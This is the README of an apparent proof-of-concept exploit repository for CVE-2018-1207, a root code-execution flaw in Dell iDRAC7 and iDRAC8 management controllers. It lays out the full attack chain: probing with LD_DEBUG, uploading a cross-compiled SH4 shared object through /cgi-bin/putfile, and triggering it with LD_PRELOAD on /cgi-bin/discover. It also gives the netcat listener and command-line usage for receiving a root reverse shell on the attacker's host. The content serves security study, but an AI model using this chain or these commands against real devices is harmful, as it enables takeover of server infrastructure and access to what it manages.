Reverse Shell CVE for iDRAC 7 & 8 with firmware 2.52.52.52 and below.# Exploit PoC for CVE-2018-1207: Dell iDRAC7/iDRAC8 RCE (Reverse Shell)
This repository contains a Proof of Concept python script to demonstrate a remote code execution exploit present in iDRAC7 and iDRAC8 devices with firmware versions 2.52.52.52 and below. This exploit allows attacks to run code as a root level user, which can lead to a total system takeover. In the code, we show this by running a reverse shell attack using the exploit. The code in this repository is an edited version of the original exploit by Michael Gargiullo (mgargiullo).
**Disclaimer** - This code is provided for educational purposes only. You may not use this script to attack devices you do not own or do not have explicit, written consent to do so. Using this script on systems without proper authorization is illegal. I am not responsible for any misuse or damage caused by this tool. Unauthorized use can lead to severe legal consequences, including fines and jail time.
## How does this exploit work?
1. The exploit first checks if the target is vulnerable. It does this by sending a request to the login page with a special parameter: `?LD_DEBUG=files`. If the response includes debugging content showing which libary files it's trying to load, then we know it's vulnerable.
2. Once the check if complete and the device is vulnerable the script then makes a file with C code, which the device will run when we trigger the exploit resulting in a reverse shell connection.
3. We then compile the created file with the C code using `sh4-linux-gnu-gcc`. Since the iDRAC runs on a SuperH (SH4) processor architecture, we need to compile code into a shared object (`.so`) so it can be executed by the iDRAC.
4. Once the compilation is complete, we can then upload the file by making a `POST` request to `/cgi-bin/putfile` to where it saves the file to `/tmp/sshpkauthupload.tmp`.
5. After the file is uploaded, we then send another `GET` request to `/cgi-bin/discover` with the `?LD_PRELOAD=/tmp/sshpkauthupload.tmp` parameter. This forces the iDRAC to load a specified library before any other library, which then loads the modified `.so` file from the `/tmp/` directory.
6. Because the payload's code is in a `constructor` function, the code is instantly ran upon being loaded, resulting in a reverse shell as the `root` user (the user with the highest permissions on a linux based system).
## Requirements
Before running the script, please ensure you have the following:
- Python3
- Python3's requests module (can be installed via `pip install requests`)
- SH4 C Cross-Compiler (can be installed via `sudo apt install gcc-sh4-linux-gnu`)
Without these requirements, you will experience issues and the exploit will not be able to fully run! No checks are in place to ensure you have these requirements met.
## Usage
1. Start a listener on your machine to catch the reverse shell, use netcat for this.
```bash
nc -lvnp <LPORT>
```
Replace `<LPORT>` with the port you want to listen on (e.g., `5000`).
2. Run the script with the required arguments.
```bash
python3 cve-2018-1207.py --rhost <RHOST> --rport <RPORT> --lhost <LHOST> --lport <LPORT>
```
### Arguments
* `--rhost`: The IP address of the target iDRAC.
* `--rport`: The port of the iDRAC web interface (usually `443`).
* `--lhost`: Your local IP address for the reverse shell to connect back to.
* `--lport`: Your local port that the Netcat listener is running on.
* `--keep-payload`: (Optional) If set, the script will not delete `payload.c` and `payload.so` from your machine after execution.
### Example
1. Attacker Machine (IP: 192.168.1.100) - Start the listener.
```bash
nc -lvnp 5000
```
2. Attacker's machine - Run the exploit targeting an iDRAC at `192.168.1.50`.
```bash
python3 cve-2018-1207.py --rhost 192.168.1.50 --rport 443 --lhost 192.168.1.100 --lport 5000
```
If successful, you will receive a shell session in your Netcat terminal to where you can run commands such as racadm.
[4.0K] /data/pocs/7d1aefaa592365dcb6b335fd045b51ccca5b19c0
├── [ 10K] cve-2018-1207.py
└── [3.9K] README.md
0 directories, 2 files